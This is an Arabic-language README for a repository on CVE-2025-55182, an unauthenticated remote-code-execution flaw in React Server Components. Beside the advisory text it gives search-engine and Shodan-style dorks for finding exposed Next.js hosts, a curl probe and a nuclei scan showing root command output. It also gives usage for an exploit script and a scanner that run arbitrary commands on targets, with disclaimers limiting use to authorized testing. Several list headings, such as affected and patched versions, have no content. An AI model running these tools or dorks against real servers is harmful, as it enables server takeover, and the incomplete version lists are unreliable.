
ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على تنفيذ مكونات خادم React (RSC) ضمن حزم متعددة تشمل.
CVE-2025-55182 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على تنفيذ مكونات خادم React (RSC) في حزم متعددة تشمل:
توجد الثغرة بسبب إلغاء التسلسل غير الآمن للبيانات المرسلة عبر بروتوكول Flight الداخلي المستخدم من قبل RSC. عندما تمر مدخلات غير موثوقة معينة عبر مكونات خادم React عبر طلبات HTTP، قد يتم تشغيل تنفيذ تعليمات برمجية من جانب الخادم.
الإصدارات المتأثرة تشمل:
الإصدارات المُصحّحة تشمل:
تقبل مكونات خادم React طلبات من جانب العميل يتم تحليلها وإلغاء تسلسلها في الواجهة الخلفية. تنشأ الثغرة من عناصر تحكم غير كافية حول إلغاء تسلسل البيانات الواردة، مما يسمح بتفسير الحمولات المصممة خصيصًا كمكونات قابلة للتنفيذ من جانب الخادم.
عند حدوث ذلك، قد يحدث تنفيذ عشوائي لجافا سكريبت على الخادم، مما قد يؤدي إلى اختراق كامل للخادم اعتمادًا على بيئة الاستضافة والصلاحيات.
إذا تم استغلالها، قد يتمكن المهاجم من:
نقاط CVSS: 10.0 – حرجة
التحقق مما إذا كان التطبيق يعرض مكونات خادم React وما إذا كانت الإصدارات المتأثرة قيد الاستخدام.
curl -I https://target.com/?__rsc=1
تساعد هذه الكلمات المفتاحية في تحديد ما إذا كان مستودع عام أو تطبيق ويب يشير إلى مكونات RSC.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
مخصص للتدقيق الداخلي لنطاق مؤسستك فقط.
تحقق من استخدام الإطار المكشوف، وليس استغلال الثغرات.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
لأتمتة المسح الدفاعي، استنسخ منطق الكشف القائم على القوالب لتقييم البنية التحتية الخاصة بك:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)نص استغلال RCE كامل الميزات ينفذ أوامر عشوائية ويسترد المخرجات.
الاستخدام:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# المسح باستخدام الأمر الافتراضي (id)
./scanner.sh -d example.com
# تنفيذ أمر مخصص
./scanner.sh -d example.com -c "whoami"
# مع رابط كامل
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - المجال/الرابط المستهدف (مطلوب)-c, --command - الأمر المراد تنفيذه (الافتراضي: id)# التحقق مما إذا كان الهدف ضعيفًا
./scanner.sh -d vulnerable-app.com
# الحصول على معلومات النظام
./scanner.sh -d vulnerable-app.com -c "uname -a"
# عرض الملفات
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
القوالب داخل المستودع مخصصة لـ:
مهم: يجب تنفيذ هذه القوالب فقط على الأنظمة التي تملكها أو مخول بتقييمها.
قوالب Nuclei المضمنة في هذا المستودع مخصصة فقط لـ:
يرجى التأكد من:
قم بالترقية إلى أحد الإصدارات المُصحّحة:
باحث أمني • مدرب أمن سيبراني • صائد ثغرات
الشعار: Zero Trust Full Secure 🚀
CVE-2025-55182 هي حاليًا واحدة من أكثر التهديدات خطورة للبنى التحتية القائمة على React. نظرًا لسهولة ناقل الاستغلال وسطح الهجوم غير المصادق عليه، يُنصح بشدة بالتصحيح الفوري. أي مؤسسة تدير إصدارات RSC متأثرة يجب أن تنظر في الأولوية الطارئة.
هذا المستودع والوثائق مخصصان للبحث الدفاعي والتحقق الأمني للأصول التي تملكها. أي سوء استخدام قد يكون غير قانوني. أنت مسؤول عن الامتثال للقوانين والسياسات التنظيمية.
تم إنشاؤه بـ ❤️ بواسطة Cyber Leelawat
Zero Trust Full Secure 🎯🔐